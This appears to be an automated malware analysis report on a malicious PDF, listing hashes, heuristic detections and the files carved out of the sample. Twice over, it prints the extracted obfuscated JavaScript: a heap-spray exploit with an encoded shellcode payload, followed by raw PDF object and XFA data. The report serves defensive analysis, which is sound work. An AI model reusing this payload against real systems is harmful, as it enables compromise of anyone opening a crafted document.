Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ac8be7bca658a8e…

MALICIOUS

PDF

53.6 KB First seen: 2026-05-10
MD5: 42d7fed2e8012edba97dc0da59b971e4 SHA-1: 0333d2980778b7e4c6efece2d035e8980c5a7825 SHA-256: 2ac8be7bca658a8e262cd1c3d3ec903a0d974eaaa6dd0be1b81d103f21f8d25f
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3878 bytes
SHA-256: 97bc96839704ed310d5cd09de564691f74ff79e48b8e394299269c046ceb380d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 12 identifiers look randomly generated (e.g. 'AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZi') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN = unescape;
var UrxEhWImpsoluHkJIGhnZCgOCfDt = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uf0be%ud19a%u3138%udac9%ud9c4%u2474%u5df4%u49b1%ued83%u31fc%u0e75%u7503%u120e%u2d6f%u5bd0%uce90%u3b21%u2b18%u6910%u3f7e%ubd01%u6df4%u36aa%u8658%u3a39%ua975%uf08a%u84a3%u350b%u4a6c%u54cf%u9110%ub61c%u5a29%ub751%u876e%ue59a%uc327%u1909%u9143%u1891%u9d83%u62aa%u62a6%ud85e%ub2a9%u57cf%u2ae1%u3f7b%u4bd2%u5ca8%u052e%u96c5%u94c4%ue70f%ua725%uab6f%u071b%ub262%ua05c%uc19d%ud296%ud120%ua86c%u54fe%u0a71%uce74%uaa51%u8859%ua012%udf16%ua57d%u0ca9%ud1f6%ub322%u53d9%u9770%u38fd%ub622%ue4a4%uc785%u41b7%u6d79%u60b3%u176e%uec9e%u2543%ued21%u3ecb%udf52%u9454%u53fc%u321c%u94fa%u8237%u6a94%uf2b8%ua8bd%ua2ec%u19d5%u298d%ua526%ufd58%u0976%ubd33%ue926%u55e3%ue62d%u45dc%u2c4e%uef75%ua7b4%u47ba%u1fb6%u9553%u4eb7%u10ff%u1a51%u74ef%ub3c9%udd96%u2281%uc856%u65ef%ufedc%u2b10%u8b15%udc02%uc6d5%u4b79%ufde9%u7414%uf97f%u23be%u0317%u04e6%ufcb8%u1ecd%u6871%u48ae%u7c7e%u892e%u1628%ue12e%u428c%u147d%u5fd3%u8511%u5f46%u7940%u37c0%ua46e%u9826%u8391%ue5b6%uea47%u1f3c%u1ee2%u41fd' );
var cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.length + 20 + 8 < 65536) cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm+=cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ = cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.substring(0, (0x0c0c-0x24)/2);
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += UrxEhWImpsoluHkJIGhnZCgOCfDt;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh = AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ.substring(0, 65536/2);
while(HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.length < 0x80000) HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh += HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh;
suUbiJqpWcoQbSdVw = HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.substring(0, 0x80000 - (0x1020-0x08) / 2);
var oOOxBs = new Array();
for (EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ=0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ<0x1f0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ++) oOOxBs[EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ]=suUbiJqpWcoQbSdVw+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4764 bytes
SHA-256: 54bc56912eeb3413a4a889fdd8213c4aaaf11b74dd78b53326d1e9a137a4ca48
Preview script
First 1,000 lines of the extracted script
var coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN = unescape;
var UrxEhWImpsoluHkJIGhnZCgOCfDt = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uf0be%ud19a%u3138%udac9%ud9c4%u2474%u5df4%u49b1%ued83%u31fc%u0e75%u7503%u120e%u2d6f%u5bd0%uce90%u3b21%u2b18%u6910%u3f7e%ubd01%u6df4%u36aa%u8658%u3a39%ua975%uf08a%u84a3%u350b%u4a6c%u54cf%u9110%ub61c%u5a29%ub751%u876e%ue59a%uc327%u1909%u9143%u1891%u9d83%u62aa%u62a6%ud85e%ub2a9%u57cf%u2ae1%u3f7b%u4bd2%u5ca8%u052e%u96c5%u94c4%ue70f%ua725%uab6f%u071b%ub262%ua05c%uc19d%ud296%ud120%ua86c%u54fe%u0a71%uce74%uaa51%u8859%ua012%udf16%ua57d%u0ca9%ud1f6%ub322%u53d9%u9770%u38fd%ub622%ue4a4%uc785%u41b7%u6d79%u60b3%u176e%uec9e%u2543%ued21%u3ecb%udf52%u9454%u53fc%u321c%u94fa%u8237%u6a94%uf2b8%ua8bd%ua2ec%u19d5%u298d%ua526%ufd58%u0976%ubd33%ue926%u55e3%ue62d%u45dc%u2c4e%uef75%ua7b4%u47ba%u1fb6%u9553%u4eb7%u10ff%u1a51%u74ef%ub3c9%udd96%u2281%uc856%u65ef%ufedc%u2b10%u8b15%udc02%uc6d5%u4b79%ufde9%u7414%uf97f%u23be%u0317%u04e6%ufcb8%u1ecd%u6871%u48ae%u7c7e%u892e%u1628%ue12e%u428c%u147d%u5fd3%u8511%u5f46%u7940%u37c0%ua46e%u9826%u8391%ue5b6%uea47%u1f3c%u1ee2%u41fd' );
var cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm = coQNTegmyZyMIoYvUpMDsMcYhZvSrCSSuvFZRTLCQEcbGiRQXLN( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.length + 20 + 8 < 65536) cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm+=cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ = cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm.substring(0, (0x0c0c-0x24)/2);
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += UrxEhWImpsoluHkJIGhnZCgOCfDt;
AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ += cIivodtGdsGckGnPFmXRLkYiBxmrggQbuqfUJKxoyoblxxqdRRGKLTjRKmiXzSXzcTm;
HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh = AAmtiyXqzXekvUcCbPLaQkqEtpzLEZkGMaBebwZiEkcInvovEVyATeWHQTNHJZltvMQYiTnVyfwYSQPuKOQ.substring(0, 65536/2);
while(HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.length < 0x80000) HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh += HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh;
suUbiJqpWcoQbSdVw = HjGqWSTbzdJXCTjsidNCJbQsfczXYofRbRGdpqKDBLmtSarXUzLvXvDllNXFdPLfXlrh.substring(0, 0x80000 - (0x1020-0x08) / 2);
var oOOxBs = new Array();
for (EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ=0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ<0x1f0;EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ++) oOOxBs[EvSKmLofqXOGKOJppUzGDEkFsMUoPCHBrYVPtLNuPCRXmrpvecypHEjXUJAampZ]=suUbiJqpWcoQbSdVw+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054044 00000 n
0000054077 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54563
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 263b1dee80ba6825cc22da5188921f5941214d28be284bb0ed19cecd88b72028
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.